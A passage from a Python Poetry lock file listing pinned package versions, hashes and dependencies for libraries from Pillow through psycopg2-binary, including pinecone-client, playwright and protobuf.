"sha256:3b834f4b16173e5b92ab6566f0473bfb09f939ba14b23b8da1f54fa63e4b623f"}, {file = "Pillow-10.1.0.tar.gz", hash = "sha256:e6bf8de6c36ed96c86ea3b6e1d5273c53f46ef518a062464cd7ef5dd2cf92e38"}, ] [package.extras] docs = ["furo", "olefile", "sphinx (>=2.4)", "sphinx-copybutton", "sphinx-inline-tabs", "sphinx-removed-in", "sphinxext-opengraph"] tests = ["check-manifest", "coverage", "defusedxml", "markdown2", "olefile", "packaging", "pyroma", "pytest", "pytest-cov", "pytest-timeout"] [[package]] name = "pinecone-client" version = "2.2.4" description = "Pinecone client and SDK" optional = true python-versions = ">=3.8" files = [ {file = "pinecone-client-2.2.4.tar.gz", hash = "sha256:2c1cc1d6648b2be66e944db2ffa59166a37b9164d1135ad525d9cd8b1e298168"}, {file = "pinecone_client-2.2.4-py3-none-any.whl", hash = "sha256:5bf496c01c2f82f4e5c2dc977cc5062ecd7168b8ed90743b09afcc8c7eb242ec"}, ] [package.dependencies] dnspython = ">=2.0.0" loguru = ">=0.5.0" numpy = ">=1.22.0" python-dateutil = ">=2.5.3" pyyaml = ">=5.4" requests = ">=2.19.0" tqdm = ">=4.64.1" typing-extensions = ">=3.7.4" urllib3 = ">=1.21.1" [package.extras] grpc = ["googleapis-common-protos (>=1.53.0)", "grpc-gateway-protoc-gen-openapiv2 (==0.1.0)", "grpcio (>=1.44.0)", "lz4 (>=3.1.3)", "protobuf (>=3.20.0,<3.21.0)"] [[package]] name = "pinecone-text" version = "0.4.2" description = "Text utilities library by Pinecone.io" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "pinecone_text-0.4.2-py3-none-any.whl", hash = "sha256:79468c197b2fc7738c1511a6b5b8e7697fad613604ad935661a438f621ad2004"}, {file = 
"pinecone_text-0.4.2.tar.gz", hash = "sha256:131d9d1cc5654bdff8c4e497bb00e54fcab07a3b501e38aa16a6f19c2f00d4c6"}, ] [package.dependencies] mmh3 = ">=3.1.0,<4.0.0" nltk = ">=3.6.5,<4.0.0" sentence-transformers = ">=2.0.0,<3.0.0" torch = ">=1.13.1,<2.0.0" transformers = ">=4.26.1,<5.0.0" wget = ">=3.2,<4.0" [[package]] name = "pkgutil-resolve-name" version = "1.3.10" description = "Resolve a name to an object." optional = false python-versions = ">=3.6" files = [ {file = "pkgutil_resolve_name-1.3.10-py3-none-any.whl", hash = "sha256:ca27cc078d25c5ad71a9de0a7a330146c4e014c2462d9af19c6b828280649c5e"}, {file = "pkgutil_resolve_name-1.3.10.tar.gz", hash = "sha256:357d6c9e6a755653cfd78893817c0853af365dd51ec97f3d358a819373bbd174"}, ] [[package]] name = "platformdirs" version = "3.11.0" description = "A small Python package for determining appropriate platform-specific dirs, e.g. a \"user data dir\"." optional = false python-versions = ">=3.7" files = [ {file = "platformdirs-3.11.0-py3-none-any.whl", hash = "sha256:e9d171d00af68be50e9202731309c4e658fd8bc76f55c11c7dd760d023bda68e"}, {file = "platformdirs-3.11.0.tar.gz", hash = "sha256:cf8ee52a3afdb965072dcc652433e0c7e3e40cf5ea1477cd4b3b1d2eb75495b3"}, ] [package.extras] docs = ["furo (>=2023.7.26)", "proselint (>=0.13)", "sphinx (>=7.1.1)", "sphinx-autodoc-typehints (>=1.24)"] test = ["appdirs (==1.4.4)", "covdefaults (>=2.3)", "pytest (>=7.4)", "pytest-cov (>=4.1)", "pytest-mock (>=3.11.1)"] [[package]] name = "playwright" version = "1.39.0" description = "A high-level API to automate web browsers" optional = false python-versions = ">=3.8" files = [ {file = "playwright-1.39.0-py3-none-macosx_10_13_x86_64.whl", hash = "sha256:384e195a6d09343f319031cf552e9cd601ede78fe9c082b9fa197537c5cbfe7a"}, {file = "playwright-1.39.0-py3-none-macosx_11_0_arm64.whl", hash = "sha256:d2c3634411828d9273196ed6f69f2fa7645c89732b3c982dcf09ab03ed4c5d2b"}, {file = "playwright-1.39.0-py3-none-macosx_11_0_universal2.whl", hash = "sha256:d2fd90f370599cf9a2c6a041bd79a5eeec62baf0e943c7c5c2079b29be476d2a"}, {file = "playwright-1.39.0-py3-none-manylinux1_x86_64.whl", hash = "sha256:699a8e707ca5f3567aa28223ee1be7e42d2bf25eda7d3d86babda71e36e5f16f"}, {file = "playwright-1.39.0-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:654bb3ae0dc3c69ffddc0c38c127c3b8e93032d8cf3928e2c4f21890cb39514b"}, {file = "playwright-1.39.0-py3-none-win32.whl", hash = "sha256:40ed7f2546c64f1bb3d22b2295b4d43ed5a2f0b7ea7599d93a72f723a1883e1e"}, {file = "playwright-1.39.0-py3-none-win_amd64.whl", hash = "sha256:a420d814e21b05e1156747e2a9fae6c3cca2b46bb4a0226fb26ee65538ce09c9"}, ] [package.dependencies] greenlet = "3.0.0" pyee = "11.0.1" typing-extensions = {version = "*", markers = "python_version <= \"3.8\""} [[package]] name = "pluggy" version = "1.3.0" description = "plugin and hook calling mechanisms for python" optional = false python-versions = ">=3.8" files = [ {file = "pluggy-1.3.0-py3-none-any.whl", hash = "sha256:d89c696a773f8bd377d18e5ecda92b7a3793cbe66c87060a6fb58c7b6e1061f7"}, {file = "pluggy-1.3.0.tar.gz", hash = "sha256:cf61ae8f126ac6f7c451172cf30e3e43d3ca77615509771b3a984a0730651e12"}, ] [package.extras] dev = ["pre-commit", "tox"] testing = ["pytest", "pytest-benchmark"] [[package]] name = "pooch" version = "1.8.0" description = "\"Pooch manages your Python library's sample data files: it automatically downloads and stores them in a local directory, with support for versioning and corruption checks.\"" optional = true python-versions = ">=3.7" files = [ {file = 
"pooch-1.8.0-py3-none-any.whl", hash = "sha256:1bfba436d9e2ad5199ccad3583cca8c241b8736b5bb23fe67c213d52650dbb66"}, {file = "pooch-1.8.0.tar.gz", hash = "sha256:f59981fd5b9b5d032dcde8f4a11eaa492c2ac6343fae3596a2fdae35fc54b0a0"}, ] [package.dependencies] packaging = ">=20.0" platformdirs = ">=2.5.0" requests = ">=2.19.0" [package.extras] progress = ["tqdm (>=4.41.0,<5.0.0)"] sftp = ["paramiko (>=2.7.0)"] xxhash = ["xxhash (>=1.4.3)"] [[package]] name = "portalocker" version = "2.8.2" description = "Wraps the portalocker recipe for easy usage" optional = true python-versions = ">=3.8" files = [ {file = "portalocker-2.8.2-py3-none-any.whl", hash = "sha256:cfb86acc09b9aa7c3b43594e19be1345b9d16af3feb08bf92f23d4dce513a28e"}, {file = "portalocker-2.8.2.tar.gz", hash = "sha256:2b035aa7828e46c58e9b31390ee1f169b98e1066ab10b9a6a861fe7e25ee4f33"}, ] [package.dependencies] pywin32 = {version = ">=226", markers = "platform_system == \"Windows\""} [package.extras] docs = ["sphinx (>=1.7.1)"] redis = ["redis"] tests = ["pytest (>=5.4.1)", "pytest-cov (>=2.8.1)", "pytest-mypy (>=0.8.0)", "pytest-timeout (>=2.1.0)", "redis", "sphinx (>=6.0.0)", "types-redis"] [[package]] name = "pox" version = "0.3.3" description = "utilities for filesystem exploration and automated builds" optional = true python-versions = ">=3.7" files = [ {file = "pox-0.3.3-py3-none-any.whl", hash = "sha256:e95febf7401918478a3c1441a3630656d9a2049803889b4f589821372889d0ce"}, {file = "pox-0.3.3.tar.gz", hash = "sha256:e1ced66f2a0c92a58cf3646bc7ccb8b4773d40884b76f85eeda0670474871667"}, ] [[package]] name = "ppft" version = "1.7.6.7" description = "distributed and parallel Python" optional = true python-versions = ">=3.7" files = [ {file = "ppft-1.7.6.7-py3-none-any.whl", hash = "sha256:fedb1b1253729d62483f2e1f36547fd50a5fc873ffbf9b78b48cfdc727d4180c"}, {file = "ppft-1.7.6.7.tar.gz", hash = "sha256:ab34436814e2f18238f35688fd869b2641b2d2d8dca22b8d246f6701dfc954c8"}, ] [package.extras] dill = ["dill (>=0.3.7)"] [[package]] name = "prometheus-client" version = "0.17.1" description = "Python client for the Prometheus monitoring system." optional = false python-versions = ">=3.6" files = [ {file = "prometheus_client-0.17.1-py3-none-any.whl", hash = "sha256:e537f37160f6807b8202a6fc4764cdd19bac5480ddd3e0d463c3002b34462101"}, {file = "prometheus_client-0.17.1.tar.gz", hash = "sha256:21e674f39831ae3f8acde238afd9a27a37d0d2fb5a28ea094f0ce25d2cbf2091"}, ] [package.extras] twisted = ["twisted"] [[package]] name = "prompt-toolkit" version = "3.0.39" description = "Library for building powerful interactive command lines in Python" optional = false python-versions = ">=3.7.0" files = [ {file = "prompt_toolkit-3.0.39-py3-none-any.whl", hash = "sha256:9dffbe1d8acf91e3de75f3b544e4842382fc06c6babe903ac9acb74dc6e08d88"}, {file = "prompt_toolkit-3.0.39.tar.gz", hash = "sha256:04505ade687dc26dc4284b1ad19a83be2f2afe83e7a828ace0c72f3a1df72aac"}, ] [package.dependencies] wcwidth = "*" [[package]] name = "proto-plus" version = "1.22.3" description = "Beautiful, Pythonic protocol buffers." 
optional = true python-versions = ">=3.6" files = [ {file = "proto-plus-1.22.3.tar.gz", hash = "sha256:fdcd09713cbd42480740d2fe29c990f7fbd885a67efc328aa8be6ee3e9f76a6b"}, {file = "proto_plus-1.22.3-py3-none-any.whl", hash = "sha256:a49cd903bc0b6ab41f76bf65510439d56ca76f868adf0274e738bfdd096894df"}, ] [package.dependencies] protobuf = ">=3.19.0,<5.0.0dev" [package.extras] testing = ["google-api-core[grpc] (>=1.31.5)"] [[package]] name = "protobuf" version = "3.19.6" description = "Protocol Buffers" optional = false python-versions = ">=3.5" files = [ {file = "protobuf-3.19.6-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:010be24d5a44be7b0613750ab40bc8b8cedc796db468eae6c779b395f50d1fa1"}, {file = "protobuf-3.19.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:11478547958c2dfea921920617eb457bc26867b0d1aa065ab05f35080c5d9eb6"}, {file = "protobuf-3.19.6-cp310-cp310-win32.whl", hash = "sha256:559670e006e3173308c9254d63facb2c03865818f22204037ab76f7a0ff70b5f"}, {file = "protobuf-3.19.6-cp310-cp310-win_amd64.whl", hash = "sha256:347b393d4dd06fb93a77620781e11c058b3b0a5289262f094379ada2920a3730"}, {file = "protobuf-3.19.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:a8ce5ae0de28b51dff886fb922012dad885e66176663950cb2344c0439ecb473"}, {file = "protobuf-3.19.6-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:90b0d02163c4e67279ddb6dc25e063db0130fc299aefabb5d481053509fae5c8"}, {file = "protobuf-3.19.6-cp36-cp36m-win32.whl", hash = "sha256:30f5370d50295b246eaa0296533403961f7e64b03ea12265d6dfce3a391d8992"}, {file = "protobuf-3.19.6-cp36-cp36m-win_amd64.whl", hash = "sha256:0c0714b025ec057b5a7600cb66ce7c693815f897cfda6d6efb58201c472e3437"}, {file = "protobuf-3.19.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5057c64052a1f1dd7d4450e9aac25af6bf36cfbfb3a1cd89d16393a036c49157"}, {file = "protobuf-3.19.6-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:bb6776bd18f01ffe9920e78e03a8676530a5d6c5911934c6a1ac6eb78973ecb6"}, {file = "protobuf-3.19.6-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:84a04134866861b11556a82dd91ea6daf1f4925746b992f277b84013a7cc1229"}, {file = "protobuf-3.19.6-cp37-cp37m-win32.whl", hash = "sha256:4bc98de3cdccfb5cd769620d5785b92c662b6bfad03a202b83799b6ed3fa1fa7"}, {file = "protobuf-3.19.6-cp37-cp37m-win_amd64.whl", hash = "sha256:aa3b82ca1f24ab5326dcf4ea00fcbda703e986b22f3d27541654f749564d778b"}, {file = "protobuf-3.19.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2b2d2913bcda0e0ec9a784d194bc490f5dc3d9d71d322d070b11a0ade32ff6ba"}, {file = "protobuf-3.19.6-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:d0b635cefebd7a8a0f92020562dead912f81f401af7e71f16bf9506ff3bdbb38"}, {file = "protobuf-3.19.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7a552af4dc34793803f4e735aabe97ffc45962dfd3a237bdde242bff5a3de684"}, {file = "protobuf-3.19.6-cp38-cp38-win32.whl", hash = "sha256:0469bc66160180165e4e29de7f445e57a34ab68f49357392c5b2f54c656ab25e"}, {file = "protobuf-3.19.6-cp38-cp38-win_amd64.whl", hash = "sha256:91d5f1e139ff92c37e0ff07f391101df77e55ebb97f46bbc1535298d72019462"}, {file = "protobuf-3.19.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c0ccd3f940fe7f3b35a261b1dd1b4fc850c8fde9f74207015431f174be5976b3"}, {file = "protobuf-3.19.6-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:30a15015d86b9c3b8d6bf78d5b8c7749f2512c29f168ca259c9d7727604d0e39"}, {file = "protobuf-3.19.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 
"sha256:878b4cd080a21ddda6ac6d1e163403ec6eea2e206cf225982ae04567d39be7b0"}, {file = "protobuf-3.19.6-cp39-cp39-win32.whl", hash = "sha256:5a0d7539a1b1fb7e76bf5faa0b44b30f812758e989e59c40f77a7dab320e79b9"}, {file = "protobuf-3.19.6-cp39-cp39-win_amd64.whl", hash = "sha256:bbf5cea5048272e1c60d235c7bd12ce1b14b8a16e76917f371c718bd3005f045"}, {file = "protobuf-3.19.6-py2.py3-none-any.whl", hash = "sha256:14082457dc02be946f60b15aad35e9f5c69e738f80ebbc0900a19bc83734a5a4"}, {file = "protobuf-3.19.6.tar.gz", hash = "sha256:5f5540d57a43042389e87661c6eaa50f47c19c6176e8cf1c4f287aeefeccb5c4"}, ] [[package]] name = "psutil" version = "5.9.6" description = "Cross-platform lib for process and system monitoring in Python." optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*" files = [ {file = "psutil-5.9.6-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:fb8a697f11b0f5994550555fcfe3e69799e5b060c8ecf9e2f75c69302cc35c0d"}, {file = "psutil-5.9.6-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:91ecd2d9c00db9817a4b4192107cf6954addb5d9d67a969a4f436dbc9200f88c"}, {file = "psutil-5.9.6-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:10e8c17b4f898d64b121149afb136c53ea8b68c7531155147867b7b1ac9e7e28"}, {file = "psutil-5.9.6-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:18cd22c5db486f33998f37e2bb054cc62fd06646995285e02a51b1e08da97017"}, {file = "psutil-5.9.6-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:ca2780f5e038379e520281e4c032dddd086906ddff9ef0d1b9dcf00710e5071c"}, {file = "psutil-5.9.6-cp27-none-win32.whl", hash = "sha256:70cb3beb98bc3fd5ac9ac617a327af7e7f826373ee64c80efd4eb2856e5051e9"}, {file = "psutil-5.9.6-cp27-none-win_amd64.whl", hash = "sha256:51dc3d54607c73148f63732c727856f5febec1c7c336f8f41fcbd6315cce76ac"}, {file = "psutil-5.9.6-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:c69596f9fc2f8acd574a12d5f8b7b1ba3765a641ea5d60fb4736bf3c08a8214a"}, {file = "psutil-5.9.6-cp36-abi3-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:92e0cc43c524834af53e9d3369245e6cc3b130e78e26100d1f63cdb0abeb3d3c"}, {file = "psutil-5.9.6-cp36-abi3-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:748c9dd2583ed86347ed65d0035f45fa8c851e8d90354c122ab72319b5f366f4"}, {file = "psutil-5.9.6-cp36-cp36m-win32.whl", hash = "sha256:3ebf2158c16cc69db777e3c7decb3c0f43a7af94a60d72e87b2823aebac3d602"}, {file = "psutil-5.9.6-cp36-cp36m-win_amd64.whl", hash = "sha256:ff18b8d1a784b810df0b0fff3bcb50ab941c3b8e2c8de5726f9c71c601c611aa"}, {file = "psutil-5.9.6-cp37-abi3-win32.whl", hash = "sha256:a6f01f03bf1843280f4ad16f4bde26b817847b4c1a0db59bf6419807bc5ce05c"}, {file = "psutil-5.9.6-cp37-abi3-win_amd64.whl", hash = "sha256:6e5fb8dc711a514da83098bc5234264e551ad980cec5f85dabf4d38ed6f15e9a"}, {file = "psutil-5.9.6-cp38-abi3-macosx_11_0_arm64.whl", hash = "sha256:daecbcbd29b289aac14ece28eca6a3e60aa361754cf6da3dfb20d4d32b6c7f57"}, {file = "psutil-5.9.6.tar.gz", hash = "sha256:e4b92ddcd7dd4cdd3f900180ea1e104932c7bce234fb88976e2a3b296441225a"}, ] [package.extras] test = ["enum34", "ipaddress", "mock", "pywin32", "wmi"] [[package]] name = "psychicapi" version = "0.8.4" description = "Psychic.dev is an open-source data integration platform for LLMs. 
This is the Python client for Psychic" optional = true python-versions = "*" files = [ {file = "psychicapi-0.8.4-py3-none-any.whl", hash = "sha256:bf0a0ea858a79c8d443565d0d1ae8d7f8c63095bf4fd2bd7723241e46b59bbd4"}, {file = "psychicapi-0.8.4.tar.gz", hash = "sha256:18dc3f2e4ab4dbbf6002c39f4ce680fbd7b86253d92403a5e6530ddf07064224"}, ] [package.dependencies] requests = "*" [[package]] name = "psycopg2" version = "2.9.9" description = "psycopg2 - Python-PostgreSQL Database Adapter" optional = true python-versions = ">=3.7" files = [ {file = "psycopg2-2.9.9-cp310-cp310-win32.whl", hash = "sha256:38a8dcc6856f569068b47de286b472b7c473ac7977243593a288ebce0dc89516"}, {file = "psycopg2-2.9.9-cp310-cp310-win_amd64.whl", hash = "sha256:426f9f29bde126913a20a96ff8ce7d73fd8a216cfb323b1f04da402d452853c3"}, {file = "psycopg2-2.9.9-cp311-cp311-win32.whl", hash = "sha256:ade01303ccf7ae12c356a5e10911c9e1c51136003a9a1d92f7aa9d010fb98372"}, {file = "psycopg2-2.9.9-cp311-cp311-win_amd64.whl", hash = "sha256:121081ea2e76729acfb0673ff33755e8703d45e926e416cb59bae3a86c6a4981"}, {file = "psycopg2-2.9.9-cp37-cp37m-win32.whl", hash = "sha256:5e0d98cade4f0e0304d7d6f25bbfbc5bd186e07b38eac65379309c4ca3193efa"}, {file = "psycopg2-2.9.9-cp37-cp37m-win_amd64.whl", hash = "sha256:7e2dacf8b009a1c1e843b5213a87f7c544b2b042476ed7755be813eaf4e8347a"}, {file = "psycopg2-2.9.9-cp38-cp38-win32.whl", hash = "sha256:ff432630e510709564c01dafdbe996cb552e0b9f3f065eb89bdce5bd31fabf4c"}, {file = "psycopg2-2.9.9-cp38-cp38-win_amd64.whl", hash = "sha256:bac58c024c9922c23550af2a581998624d6e02350f4ae9c5f0bc642c633a2d5e"}, {file = "psycopg2-2.9.9-cp39-cp39-win32.whl", hash = "sha256:c92811b2d4c9b6ea0285942b2e7cac98a59e166d59c588fe5cfe1eda58e72d59"}, {file = "psycopg2-2.9.9-cp39-cp39-win_amd64.whl", hash = "sha256:de80739447af31525feddeb8effd640782cf5998e1a4e9192ebdf829717e3913"}, {file = "psycopg2-2.9.9.tar.gz", hash = "sha256:d1454bde93fb1e224166811694d600e746430c006fbb031ea06ecc2ea41bf156"}, ] [[package]] name = "psycopg2-binary" version = "2.9.9" description = "psycopg2 - Python-PostgreSQL Database Adapter" optional = true python-versions = ">=3.7" files = [ {file = "psycopg2-binary-2.9.9.tar.gz", hash = "sha256:7f01846810177d829c7692f1f5ada8096762d9172af1b1a28d4ab5b77c923c1c"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c2470da5418b76232f02a2fcd2229537bb2d5a7096674ce61859c3229f2eb202"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c6af2a6d4b7ee9615cbb162b0738f6e1fd1f5c3eda7e5da17861eacf4c717ea7"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:75723c3c0fbbf34350b46a3199eb50638ab22a0228f93fb472ef4d9becc2382b"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:83791a65b51ad6ee6cf0845634859d69a038ea9b03d7b26e703f94c7e93dbcf9"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:0ef4854e82c09e84cc63084a9e4ccd6d9b154f1dbdd283efb92ecd0b5e2b8c84"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ed1184ab8f113e8d660ce49a56390ca181f2981066acc27cf637d5c1e10ce46e"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d2997c458c690ec2bc6b0b7ecbafd02b029b7b4283078d3b32a852a7ce3ddd98"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_i686.whl", hash = 
"sha256:b58b4710c7f4161b5e9dcbe73bb7c62d65670a87df7bcce9e1faaad43e715245"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:0c009475ee389757e6e34611d75f6e4f05f0cf5ebb76c6037508318e1a1e0d7e"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8dbf6d1bc73f1d04ec1734bae3b4fb0ee3cb2a493d35ede9badbeb901fb40f6f"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-win32.whl", hash = "sha256:3f78fd71c4f43a13d342be74ebbc0666fe1f555b8837eb113cb7416856c79682"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-win_amd64.whl", hash = "sha256:876801744b0dee379e4e3c38b76fc89f88834bb15bf92ee07d94acd06ec890a0"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ee825e70b1a209475622f7f7b776785bd68f34af6e7a46e2e42f27b659b5bc26"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1ea665f8ce695bcc37a90ee52de7a7980be5161375d42a0b6c6abedbf0d81f0f"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:143072318f793f53819048fdfe30c321890af0c3ec7cb1dfc9cc87aa88241de2"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c332c8d69fb64979ebf76613c66b985414927a40f8defa16cf1bc028b7b0a7b0"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f7fc5a5acafb7d6ccca13bfa8c90f8c51f13d8fb87d95656d3950f0158d3ce53"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:977646e05232579d2e7b9c59e21dbe5261f403a88417f6a6512e70d3f8a046be"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:b6356793b84728d9d50ead16ab43c187673831e9d4019013f1402c41b1db9b27"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:bc7bb56d04601d443f24094e9e31ae6deec9ccb23581f75343feebaf30423359"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:77853062a2c45be16fd6b8d6de2a99278ee1d985a7bd8b103e97e41c034006d2"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:78151aa3ec21dccd5cdef6c74c3e73386dcdfaf19bced944169697d7ac7482fc"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-win32.whl", hash = "sha256:dc4926288b2a3e9fd7b50dc6a1909a13bbdadfc67d93f3374d984e56f885579d"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-win_amd64.whl", hash = "sha256:b76bedd166805480ab069612119ea636f5ab8f8771e640ae103e05a4aae3e417"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:8532fd6e6e2dc57bcb3bc90b079c60de896d2128c5d9d6f24a63875a95a088cf"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8f8544b092a29a6ddd72f3556a9fcf249ec412e10ad28be6a0c0d948924f2212"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2d423c8d8a3c82d08fe8af900ad5b613ce3632a1249fd6a223941d0735fce493"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e5afae772c00980525f6d6ecf7cbca55676296b580c0e6abb407f15f3706996"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e6f98446430fdf41bd36d4faa6cb409f5140c1c2cf58ce0bbdaf16af7d3f119"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_aarch64.whl", hash = 
"sha256:c77e3d1862452565875eb31bdb45ac62502feabbd53429fdc39a1cc341d681ba"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:cb16c65dcb648d0a43a2521f2f0a2300f40639f6f8c1ecbc662141e4e3e1ee07"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:911dda9c487075abd54e644ccdf5e5c16773470a6a5d3826fda76699410066fb"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:57fede879f08d23c85140a360c6a77709113efd1c993923c59fde17aa27599fe"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:2293b001e319ab0d869d660a704942c9e2cce19745262a8aba2115ef41a0a42a"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:03ef7df18daf2c4c07e2695e8cfd5ee7f748a1d54d802330985a78d2a5a6dca9"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0a602ea5aff39bb9fac6308e9c9d82b9a35c2bf288e184a816002c9fae930b77"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8359bf4791968c5a78c56103702000105501adb557f3cf772b2c207284273984"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:275ff571376626195ab95a746e6a04c7df8ea34638b99fc11160de91f2fef503"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:f9b5571d33660d5009a8b3c25dc1db560206e2d2f89d3df1cb32d72c0d117d52"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:420f9bbf47a02616e8554e825208cb947969451978dceb77f95ad09c37791dae"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:4154ad09dac630a0f13f37b583eae260c6aa885d67dfbccb5b02c33f31a6d420"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:a148c5d507bb9b4f2030a2025c545fccb0e1ef317393eaba42e7eabd28eb6041"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-win32.whl", hash = "sha256:68fc1f1ba168724771e38bee37d940d2865cb0f562380a1fb1ffb428b75cb692"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-win_amd64.whl", hash = "sha256:281309265596e388ef483250db3640e5f414168c5a67e9c665cafce9492eda2f"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:60989127da422b74a04345096c10d416c2b41bd7bf2a380eb541059e4e999980"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:246b123cc54bb5361588acc54218c8c9fb73068bf227a4a531d8ed56fa3ca7d6"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:34eccd14566f8fe14b2b95bb13b11572f7c7d5c36da61caf414d23b91fcc5d94"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:18d0ef97766055fec15b5de2c06dd8e7654705ce3e5e5eed3b6651a1d2a9a152"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d3f82c171b4ccd83bbaf35aa05e44e690113bd4f3b7b6cc54d2219b132f3ae55"}, {file = 